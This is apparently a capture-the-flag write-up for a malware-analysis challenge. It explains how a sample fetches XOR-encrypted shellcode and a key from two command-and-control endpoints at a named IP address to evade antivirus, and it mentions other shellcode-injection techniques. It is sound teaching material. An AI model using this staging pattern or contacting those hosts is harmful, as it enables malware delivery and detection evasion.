Hacksaw
3 Solves
We have installed the newest anti-virus on our systems, however this piece of malware managed to evade our detections, maybe we should invest more into dynamic analysis.
Background Knowledge
Similar to Command & Post, this challenge heavily relies on prior knowledge of techniques used by malware developers and encryption.
This challenge utilizes two endpoints on the C2 server,
The first endpoint is used to retrieve encrypted shellcode to be executed by the victim.
The second endpoint is used to decrypt the shellcode.
This technique is used to evade signature-based analysis by AV, ensuring that even if artifacts of the shellcode is found on the system, the defender will not be able to reverse engineer the payload.
You can read more about this here.
Solution
The player is given an agent.cs
Wow, this malware developer is not very good at hiding the C2 server, you can eye-power the string[a] value by mentally adding together the link.
Endpoint 1: http://157.230.251.0:6001/shellcode Endpoint 2: http://157.230.251.0:6001/key
It seems like the shellcode
is being XOR'ed against the key
via the function called "Haxor".
For the more experienced malware developers, please don't mind my wrongful usage of cmd.exe to execute shellcode- I was very sleepy when making this challenge. The shellcode should be executed via other techniques (e.g CreateRemoteThread, etc)
The challenge solution is simply to find the raw shellcode, which in this case is actually a string (it should be injectable-asm)
Last updated